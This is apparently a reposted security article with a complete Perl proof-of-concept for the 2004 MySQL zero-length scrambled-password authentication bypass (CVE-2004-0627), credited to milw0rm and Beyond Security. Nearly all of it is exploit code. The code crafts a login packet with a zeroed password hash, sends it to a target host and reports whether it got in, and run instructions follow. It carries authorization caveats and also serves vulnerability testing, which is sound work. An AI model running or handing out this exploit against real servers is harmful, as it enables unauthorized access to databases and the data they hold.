An old article on www.2cto.com has not been posted yet
A client that sends a specially crafted authentication packet can bypass the database's password check entirely. This is the MySQL zero-length scrambled-password flaw found by NGS in 2004 (tracked as CVE-2004-0627, affecting 4.1.x before 4.1.3 and the 5.0.0 alpha); the script below sends a login packet whose password hash is all zero bytes and reports whether the server accepts it.
Note: to use this script, the target MySQL server must accept TCP connections from the host you run it on (a server that listens only on a local Unix socket, or that was started with networking disabled, cannot be tested this way), and you must be authorized to test that server.
The following test script detects whether a server is vulnerable:
#!/usr/bin/perl
#
# The script connects to MySQL and attempts to log in using a zero-length password
# Based on the vuln found by NGSSecurity
#
# The following Perl script can be used to test your version of MySQL. It will display
# the login packet sent to the server and its reply.
#
# Only run it against servers you are authorized to test.
#
# Exploit copyright (c) 2004 by Eli Kara, Beyond Security
# Elik beyondsecurity com
#
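use strict;
use warnings;
use IO::Socket::INET;

# Command line: <username> <host> [port].
# The original test "(@ARGV >= 1) || (@ARGV <= 3)" is true for any argument
# count, so usage() was never reached; require two or three arguments instead.
usage() unless (@ARGV >= 2 && @ARGV <= 3);
my $username = shift(@ARGV);
my $host     = shift(@ARGV);
usage() unless $host;
my $port = shift(@ARGV);
if (!$port)
{
    $port = 3306;
    print "Using default MySQL port (3306)\n";
}

# Plain TCP connection; the server must accept network connections from
# this host (see the note above the script).
my $socket = IO::Socket::INET->new(Proto => 'tcp', PeerAddr => $host, PeerPort => $port);
$socket or die "Cannot connect to host! ($@)\n";

# Receive the server greeting (initial handshake packet).  recv() returns
# undef on error, which the original never checked.
my $reply;
defined recv($socket, $reply, 1024, 0) or die "Cannot read greeting: $!\n";
if (length($reply) < 7)
{
    print "Not allowed to connect to MySQL!\n";
    close($socket);
    exit(1);
}
print "Received greeting:\n";
HexDump($reply);
print "\n";

# Here we define the login OK reply
# my $login_OK = "\x01\x00\x00\x02\xFE";

# The user name goes on the wire as raw bytes; the pack/unpack round trip is
# kept from the original and amounts to a byte-for-byte copy.
my $binuser = pack("C*", unpack("C*", $username));

# Client login ("caps") packet, byte layout kept verbatim from the original
# exploit: client flags, max packet size, charset and zero padding, the
# NUL-terminated user name, then a hash length byte of 0x14 followed by zero
# bytes in place of the scrambled password.  The exact field boundaries are
# not re-derived here; a vulnerable server accepts the zeroed hash.
my $packet = "\x85\xa6".
             "\x03\x00\x00".
             "\x00".
             "\x00\x01\x08\x00\x00\x00".                                   # capabilities, max packet, etc.
             ("\x00" x 17).
             "\x00\x00\x00\x00" . $binuser . "\x00\x14\x00\x00\x00\x00".  # username and pword hash length + NULL hash
             ("\x00" x 17);                                                  # continue NULL hash
# MySQL packet header: 3-byte little-endian payload length, then sequence
# number 1 (the greeting was 0).  pack("C1", length) in the original encoded
# only the low byte, so a user name long enough to push the payload past 255
# bytes would have produced a corrupt header.
substr($packet, 0, 0) = substr(pack("V", length($packet)), 0, 3) . "\x01";
print "Sending caps packet:\n";
HexDump($packet);
print "\n";
defined send($socket, $packet, 0) or die "Cannot send login packet: $!\n";

# Receive reply
defined recv($socket, $reply, 1024, 0) or die "Cannot read reply: $!\n";
print "Received reply:\n";
HexDump($reply);
my @list_bytes = unpack("C*", $reply);
# Byte 4 is the first payload byte after the 4-byte packet header, so a
# reply shorter than 5 bytes cannot be classified.  The original tested
# length(@list_bytes) -- the digit count of the array size -- with the
# comparison inverted, and then read index 4 regardless.
if (@list_bytes < 5)
{
    print "Response insufficent\n";
    close($socket);
    exit(1);
}
# 0x00 is an OK packet.  The original also counts 0xFE as success; in the
# 4.1 protocol a leading 0xFE here is an auth-switch/EOF marker rather than
# an OK packet, so it is flagged for manual confirmation instead of being
# reported as a clean bypass.
if ($list_bytes[4] == 0 || $list_bytes[4] == 254)
{
    print "Received OK reply, authentication successful!!\n";
    print "(reply byte 0xFE may be an auth-switch request rather than an OK packet -- confirm with a real client)\n"
        if $list_bytes[4] == 254;
}
else
{
    print "Authentication failed!\n";
}

# Close
close($socket);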
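sub usage
{
    # Print usage information and exit with a non-zero status.
    # Takes no arguments and never returns.  The original's usage string
    # had lost the "<host> [port]" part of the synopsis and its line breaks.
    print "\nUsage: mysql_auth_bypass_zeropass.pl <username> <host> [port]\n",
          "\t<username> - The DB username to authenticate\n",
          "\t<host>     - The host to connect to\n",
          "\t[port]     - The TCP port which MySQL is listening on (optional, default is 3306)\n";
    exit(1);
}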
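###
# Print a hex dump of a (binary) string to STDOUT.
#
# Each row holds up to 16 bytes, prefixed by the zero-padded hex offset of
# its first byte and a tab, with the bytes rendered as space-separated
# two-digit upper-case hex.  An empty buffer prints a single "00000000\t"
# line, as the original did; a buffer that is an exact multiple of 16 bytes
# no longer gets a trailing empty row (the original printed one).
#
# Arguments: $buffer - the string to dump.
# Returns:   nothing; output goes to STDOUT.
###
sub HexDump
{
    my ($buffer) = @_;
    my @bytes = unpack("C*", $buffer);

    if (!@bytes)
    {
        printf("%08X\t\n", 0);
        return;
    }

    # Walk the buffer in 16-byte rows; the last row is clamped to the end
    # of the buffer so a short tail is printed once and an exact multiple
    # of 16 produces no empty row.
    for (my $pos = 0; $pos < @bytes; $pos += 16)
    {
        my $last = $pos + 15;
        $last = $#bytes if $last > $#bytes;
        my @hex = map { sprintf("%02X", $_) } @bytes[$pos .. $last];
        printf("%08X\t%s\n", $pos, join(' ', @hex));
    }
    return;
}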
# Milw0rm.com [2004-07-10]
Because the script is run through the Perl interpreter, Perl must be installed and the interpreter path on the script's first line (#!/usr/bin/perl) must exist on the system.
Run:
Save the script as "test", make it executable with "chmod +x test", then invoke it as
./test root hostname
(first argument is the database user name, second is the host; an optional third argument gives the port, default 3306).